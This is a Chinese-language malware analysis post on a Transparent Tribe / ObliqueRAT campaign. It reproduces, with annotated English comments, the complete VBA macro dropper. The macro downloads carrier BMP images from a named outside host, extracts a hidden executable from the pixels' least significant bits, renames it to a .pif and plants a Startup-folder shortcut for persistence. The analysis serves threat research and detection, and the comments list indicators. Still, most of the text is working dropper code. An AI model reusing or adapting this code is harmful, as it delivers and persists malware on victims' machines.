图片隐写术 - 透明部落通过BMP的RGB通道隐藏PE数据

透明部落通过BMP的RGB通道隐藏PE数据

报告和样本

《Transparent Tribe APT expands its Windows malware arsenal》

技术分析不多，主要描述战术和趋势

《ObliqueRAT returns with new campaign using hijacked websites》

描述了宏代码以及RAT的更新

《ObliqueRAT: New RAT hits victims’ endpoints via malicious documents》

内容为ObliqueRAT分析，也值得一看

样本

theta.bmp

camela.bmp

merj.bmp

宏代码

DownloadBackground:下载图片
BackgroundStretch:读取BMP图片保存为xls
BackgroundSize:将字符串Letter(ASC)转为OrderByte(Byte)

'Stage 1 - downloader. Fetches `url` with a synchronous Microsoft.XMLHTTP GET and
'writes the raw response body to `filePath` through a binary ADODB.Stream.
'Retry logic: `attempts` starts at 4, but execution falls straight through the
'TryAgain label, so the counter is already 3 on the first request (at most 3 tries).
'NOTE(review): a VBA error handler stays active until Resume/Exit Sub; a second
'runtime error raised while already inside TryAgain is presumably passed to the
'caller instead of looping again - confirm before relying on the retry count.
'A non-200 status is neither retried nor reported; the Sub simply returns.
'Defender note: this is an Office process loading MSXML/ADO and writing a file
'to a fixed path - both are observable from process and file telemetry.
Sub DownloadBackground(url As String, filePath As String)
    Dim WinHttpReq As Object, attempts As Integer
    attempts = 4
    On Error GoTo TryAgain    'any runtime error re-enters the retry label below

TryAgain:
    attempts = attempts - 1   'decremented on the first pass too (see header)
    Err.Clear
    If attempts > 0 Then
        Set WinHttpReq = CreateObject(\"Microsoft.XMLHTTP\")
        WinHttpReq.Open \"GET\", url, False    'False = synchronous request
        WinHttpReq.send

        If WinHttpReq.Status = 200 Then
            Set Themeream = CreateObject(\"ADODB.Stream\")    'undeclared name; no Option Explicit in view
            Themeream.Open
            Themeream.Type = 1                                '1 = adTypeBinary
            Themeream.Write WinHttpReq.responseBody
            Themeream.SaveToFile filePath, 1                  '1 = adSaveCreateNotExist: an existing file is not overwritten
            Themeream.Close
        End If
    End If
End Sub

'Hex text -> Byte(). Despite the original "PE file size" label this does not
'compute a size: it decodes the hex string recovered from the bitmap into the
'raw bytes that BackgroundStretch then writes out as the dropped PE.
'Parsing rules visible below: each hex digit (case-insensitive) is folded into the
'byte currently being built, high nibble first; two digits complete a byte; any
'non-hex character acts as a separator, so a lone digit before a separator also
'completes a byte. Returns an empty array when no hex digit was found.
Private Function BackgroundSize(ByVal ProtectString As String) As Byte()
    Dim Nibbles() As Byte        'output buffer, grown as needed
    Dim ProtectPos As Long       '1-based index into ProtectString
    Dim ProtectDigit As Long     'value of the current hex digit, -1 if not a hex digit
    Dim CursorLen As Long        'index of the byte currently being filled
    Dim Numeris As Long          'digits consumed for the current byte (0..2)

    ReDim Nibbles(Len(ProtectString) \\ 2)    'initial capacity: one byte per two characters
    For ProtectPos = 1 To Len(ProtectString)
        ProtectDigit = InStr(\"0123456789ABCDEF\", _
                         UCase$(Mid$(ProtectString, ProtectPos, 1))) - 1
        If ProtectDigit >= 0 Then
            If CursorLen > UBound(Nibbles) Then
                ReDim Preserve Nibbles(UBound(Nibbles) + 4)    'separators can yield more than Len/2 bytes
            End If
            Nibbles(CursorLen) = Nibbles(CursorLen) * &H10 + ProtectDigit    'shift one nibble in
            Numeris = Numeris + 1
        End If
        If Numeris = 2 Or ProtectDigit < 0 Then
            If Numeris > 0 Then CursorLen = CursorLen + 1    'byte complete: move to the next slot
            Numeris = 0
        End If
    Next
    'If the last byte was already closed, CursorLen points one past it; a trailing
    'lone digit (Numeris = 1) is kept as the final byte.
    If Numeris = 0 Then CursorLen = CursorLen - 1
    If CursorLen < 0 Then
        Nibbles = \"\"            'nothing decoded: an empty string assigns a zero-length Byte array
    Else
        ReDim Preserve Nibbles(CursorLen)    'trim to the bytes actually written
    End If
    BackgroundSize = Nibbles
End Function

'Stage 2 - steganographic extractor. Reads the BMP at `pth`, recovers the hidden
'payload from the least-significant bit of each pixel byte, hex-decodes it via
'BackgroundSize and writes the result to `drpexP` (overwriting).
'All errors are suppressed (On Error Resume Next), so a missing or truncated image
'yields an empty or garbage output file instead of a failure.
'The image is read through a Scripting.FileSystemObject *text* stream; only the
'low bit of each character is used (And 1), so the LSB channel is assumed to
'survive the codepage translation - assumed here, not verified.
Sub BackgroundStretch(pth As String, ByVal drpexP As String)
On Error Resume Next
Dim byteArray() As Byte        'unused
Dim memoryAddress As Long      'unused
Dim zL As Long                 'assigned, never read
zL = 0
Dim rL As Long                 'unused
Dim arrayofWords               'unused
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Dim antiTermite, antiantiTermite, oFS, BreathTake, Letter, i, ch, WayPave
    WayPave = pth
    Set oFS = CreateObject(\"Scripting.FileSystemObject\")
    Set antiTermite = oFS.OpenTextFile(WayPave, ForReading, True)    'third arg True: a missing file is silently created empty
        i = 0            'bits collected for the current character (1..8)
        ch = 0           'character being assembled
        Letter = \"\"     'accumulated hidden text (a hex string, see BackgroundSize)
        antiTermite.Read (10)    'skip BMP header bytes 0..9
        'Bytes 10..13 as a little-endian 32-bit value: bfOffBits, the offset of the pixel array.
        BreathTake = Asc(antiTermite.Read(1))
        BreathTake = BreathTake + Asc(antiTermite.Read(1)) * 256
        BreathTake = BreathTake + Asc(antiTermite.Read(1)) * 65536
        BreathTake = BreathTake + Asc(antiTermite.Read(1)) * 16777216
        antiTermite.Read (BreathTake - 14)    '14 bytes already consumed; skip to the pixel data
        'LSB extraction: one payload bit per pixel byte, MSB-first, 8 bytes per character.
        'Stops at a NUL character or at end of file.
        Do Until antiTermite.AtEndOfStream
            i = i + 1
            ch = ch Or ((Asc(antiTermite.Read(1)) And 1) * (2 ^ (8 - i)))
            If i = 8 Then
                Letter = Letter & Chr(ch)
                If ch = 0 Then
                    Exit Do    'NUL terminator ends the hidden string
                Else
                    ch = 0
                    i = 0
                End If
            End If
        Loop
    antiTermite.Close
    Set antiTermite = Nothing
    Set oFS = Nothing

'Decode the hidden hex text into raw bytes. (The original label called this the
'"file size"; BackgroundSize returns the payload bytes, not a length.)
Dim OrderByte() As Byte
OrderByte = BackgroundSize(Letter)

'Write OrderByte to disk via two ADODB streams. Apparent intent: push the bytes
'through a UTF-16 text stream, skip its 2-byte BOM (Position = 2), copy the rest
'into a binary stream and save it. NOTE(review): that CopyTo from a text stream
'into a binary stream reproduces the bytes exactly is not established here.
Const adSaveCreateNotExist = 1
Const adTypeBinary = 1
Const adTypeText = 2
Dim objStreamUTF8: Set objStreamUTF8 = CreateObject(\"ADODB.Stream\")
Dim objStreamUTF8NoBOM: Set objStreamUTF8NoBOM = CreateObject(\"ADODB.Stream\")
With objStreamUTF8
  .Charset = \"UTF-16\"
  .Open
  .WriteText OrderByte      'Byte() passed where a String is expected; presumably taken as raw UTF-16 units - confirm
  .Position = 0
  .Type = adTypeText
  .Position = 2             'skip the UTF-16 byte-order mark
End With

With objStreamUTF8NoBOM
  .Type = adTypeBinary
  .Open
  objStreamUTF8.CopyTo objStreamUTF8NoBOM
  .SaveToFile drpexP, 2     '2 = adSaveCreateOverWrite (the adSaveCreateNotExist constant above is unused)
End With

objStreamUTF8.Close
objStreamUTF8NoBOM.Close
End Sub

'Orchestrator (its caller, presumably the document macro, is not in view).
'Stages: download the carrier BMP -> extract the hidden PE into chmodes.xlsx ->
'rename to .pif (an executable extension; the bytes are unchanged) -> create a
'.url shortcut in the user's Startup folder pointing at the .pif so it is opened
'at logon -> two further downloads whose purpose is not visible in this code.
'All errors are suppressed, so partial failures leave no trace in the macro.
'Detection points visible here: requests to iiaonline.in from an Office process,
'files under C:\\ProgramData\\SashaGrey*, C:\\Users\\Public\\555\\chmodes.pif, and a
'looper.url written to the Startup folder through WScript.Shell.
Sub BackgroundManager()
On Error Resume Next

    Dim tmpBmpP As String
    Dim tmpBmpP2 As String
    Dim tmpBmpP3 As String
	'Download "http://iiaonline.in/DefenceLogo/theta.bmp" to "C:\\ProgramData\\SashaGreyHD.bmp"
	'Sample hash listed on the source page: ED9DCC4393AF121FD177CC4669383BFD
    tmpBmpP = \"C:\\ProgramData\\SashaGreyHD.bmp\"
    DownloadBackground \"http://iiaonline.in/DefenceLogo/theta.bmp\", tmpBmpP

    'Only Science is typed String here; in VBA the other names in this Dim are Variant.
    Dim fie, fie2, flh, flh2, enPd, Science As String
    Dim iotaD  As Variant
    Dim bcfe() As Byte    'unused
    Dim lnct As Double    'assigned below, never read
    enPd = \"C:\\Users\\Public\\\"
    iotaD = enPd & \"555\\\"
    fie = \"chmodes\"
    flh = iotaD & fie & \".xlsx\"    'intermediate file: C:\\Users\\Public\\555\\chmodes.xlsx
    flh2 = iotaD & fie & \".pif\"    'final dropped executable: C:\\Users\\Public\\555\\chmodes.pif
    'The "Word\\.." and "Junk\\.." segments are decoys; the path resolves to
    '%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\looper.jpeg
    Science = Environ$(\"userprofile\") & \"\\AppData\\Roaming\\Microsoft\\Word\\..\\Windows\\Start Menu\\Programs\\Junk\\..\\Startup\\looper.jpeg\"
	'Ensure "C:\\Users\\Public\\555" exists
    If Dir(iotaD, vbDirectory) = \"\" Then
        MkDir (iotaD)
    End If

    lnct = 0
	'Extract the hidden PE from "C:\\ProgramData\\SashaGreyHD.bmp" into "C:\\Users\\Public\\555\\chmodes.xlsx"
    BackgroundStretch tmpBmpP, flh
	'Rename "chmodes.xlsx" to "chmodes.pif". Name only renames; nothing is transcoded -
	'the .pif extension is what makes the dropped bytes runnable.
    Name flh As flh2

	'Download "http://iiaonline.in/sasha.jpg" to "C:\\ProgramData\\SashaGreyHQ.jpg"
    tmpBmpP2 = \"C:\\ProgramData\\SashaGreyHQ.jpg\"
    DownloadBackground \"http://iiaonline.in/sasha.jpg\", tmpBmpP2
    tmpBmpP3 = \"C:\\ProgramData\\SashaGreyHQ2.jpg\"
	'Rename "SashaGreyHQ.jpg" to "SashaGreyHQ2.jpg". This frees the name for the last
	'download: DownloadBackground saves with option 1 and will not overwrite an existing file.
    Name tmpBmpP2 As tmpBmpP3
    
    Dim oVaccine As Object
    Dim Theme As Object
    Set oVaccine = CreateObject(\"WScript.Shell\")
	'Persistence: create the shortcut "...\\Startup\\looper.url" (Science with "jpeg" replaced by "url")
    Set Theme = oVaccine.CreateShortcut(Replace(Science, \"jpeg\", \"url\"))
	'Shortcut target is "C:\\Users\\Public\\555\\chmodes.pif", so the dropped PE is opened at logon
    With Theme
        .TargetPath = flh2
        .Save
    End With
	'Download "http://iiaonline.in/timon.jpeg" to "C:\\ProgramData\\SashaGreyHQ.jpg" (the name freed above)
    DownloadBackground \"http://iiaonline.in/timon.jpeg\", tmpBmpP2
End Sub